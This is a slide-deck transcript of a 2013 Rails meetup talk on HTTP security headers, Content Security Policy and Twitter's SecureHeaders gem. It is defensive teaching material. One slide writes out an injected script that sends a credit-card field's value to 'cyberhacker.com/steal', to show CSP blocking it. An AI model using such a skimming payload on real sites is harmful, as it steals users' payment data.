2013: OC Rails Jan - SecureHeaders library and content security policy
-
Upload
neil-matatall -
Category
Technology
-
view
1.351 -
download
2
description
Transcript of 2013: OC Rails Jan - SecureHeaders library and content security policy
@ocrails | @ndm
@ocrailsJanuary 30, 2013
Not your typical Rails security talkHeader use @ Twitter
B
@ocrails | @ndm
What are headers?
@ocrails | @ndm
Wait, not those ones
@ocrails | @ndm
OK, but what are browser headersAuthorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
Accept: text/plain
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
@ocrails | @ndm
Response headersCache-Control: max-age=3600
ETag: "737060cd8c284d8af7ad3082f209582d"
Location: http://www.w3.org/pub/WWW/People.html
@ocrails | @ndm
I’m already boredTime to get awesomer
@ocrails | @ndm
Security headersLeverage the browser for security
@ocrails | @ndm
Sweeeeet. I don’t have write secure code!
@ocrails | @ndm
Time of convergence
@ocrails | @ndm
Should you?
@ocrails | @ndm
Do you use these?Content security policy
X-Frame-Options
HTTP Strict Transport Security
X-Xss-Protection
X-Content-Type-Options
@ocrails | @ndm
X-ContentType-OptionsFixes mime sniffing attacks
Only applies to IE, because only IE would do something like this
X-Content-Type-Options = ‘nosniff’
zzzzZZZZZZzzzzz
@ocrails | @ndm
X-Xss-ProtectionUse the browser’s built in XSS Auditor
X-Xss-Protection: [0-1](; mode=block)?
X-Xss-Protection: 1; mode=block
(SCREENSHOT OF BLOCKED SCRIPT)
zzzzZZZ... huh? zzzzzzzz
@ocrails | @ndm
X-Frame-OptionsProtects you from most classes of Clickjacking
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
X-Frame-Options: ALLOW FROM example.com
zzz... oh hey thats cool. Don’t frame my stuff.
@owaspoc Jan 2013@ndm | @presidentbeef
X-Frame-Options
@ocrails | @ndm
Firesheep/SSL StripGiven I don’t haven’t received an HSTS header
And I have a session
When I visit http://example.com
Then I am pwned
@ocrails | @ndm
Other ssl failsPosting passwords over HTTP
Loading mixed content
Using protocol relative URLS
@ocrails | @ndm
Strict Transport Security
@ocrails | @ndm
How hard is it to use?Base CaseStrict-transport-security: max-age=10000000
Do all of your subdomains support SSL?Strict-transport-security: max-age=10000000; includeSubdomains
(SSL FOR DUMMIES PICTURE)
@ocrails | @ndm
Content secur-a-wat?Content security policy is reshaping the security modelIt is a complicated spec with great differences across browsers
It is not widely adopted
However, It completely eliminates reflected and stored XSSIt ensures that you never load mixed content
It can protect users with infected browsers
It allows you to accept arbitrary html code from users
@ocrails | @ndm
Wat? Sounds cool. x-webkit-csp:
script-src
style-src
img-src
default-src
frame-src
connect-src
font-src
media-src
object-src
report-uri
@owaspoc Jan 2013@ndm | @presidentbeef
QuickTime™ and aH.264 decompressor
are needed to see this picture.
@ocrails | @ndm
Get rid of XSS, eh?A script-src directive that doesn’t contain ‘unsafe-inline’ almost eliminates most forms of cross site scripting.
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
I WILL NOT WRITE INLINE JAVASCRIPT
@owaspoc Jan 2013@ndm | @presidentbeef
@owaspoc Jan 2013@ndm | @presidentbeef
But I have to...OK, then I’ll inject:<script>
var image = new Image();
image.src = “cyberhacker.com/steal?data=”+ $(‘#credit_card’).val();
</script>
FALSE! img-src violation, no XHR allowed
@ocrails | @ndm
Inline css too? WTF?
@ocrails | @ndm
Choose your own adventure
@ocrails | @ndm
Apply all the headers!
@ocrails | @ndm
How to apply?Secure headers!
Open sourced earlier this month
https://github.com/twitter/secureheaders
@ocrails | @ndm
How does it work?It sets a before_filter that applies each header
Values are based on options passed to filter, or in an initializer
Easily overridden
Secure by default!!!
@ocrails | @ndm
What about that security policy thingy
There are > 6 differences between these two header values
@ocrails | @ndm
Yay for standards
@ocrails | @ndm
Long hair don’t careAbout browser inconsistencies
@ocrails | @ndm
Other featuresSet separate policies for http/https
Autofill chrome-extension: (becoming part of spec)
Auto fill missing directives with default value (becoming part of the spec)
@ocrails | @ndm
You mean there’s more on CSP?The browser sends reports!
@ocrails | @ndm
What does the report look like?{
"csp-report"=> {
"document-uri"=>"http://localhost:3000/home",
"referrer"=>"",
"blocked-uri"=>"ws://localhost:35729/livereload",
"violated-directive"=>"xhr-src ws://localhost.twitter.com:*"
}
}
@ocrails | @ndm
Quiz: what does this report indicate?{
"csp-report"=> {
"document-uri"=>"http://example.com/welcome",
"referrer"=>"",
"blocked-uri"=>"self",
"violated-directive"=>"inline script base restriction",
"source-file"=>"http://example.com/welcome",
"script-sample"=>"alert(1)",
"line-number"=>81
}
}
@ocrails | @ndm
Header gem to the rescueIt forwards CSP reports for Firefox
It makes setting an enforce and report only mode easy for experimentation
@ocrails | @ndm
Monitor and Tune ALL the things
@ocrails | @ndm
Splunk
@ocrails | @ndm
Trending and anomalies
@owaspoc Jan 2013@ndm | @presidentbeef
CSP
Brakeman
ThreatDeckPhantom Gang
Roshambo
Emaildevelopers
Emailsecurity
@ocrails | @ndm
Who wants to buy me a beer?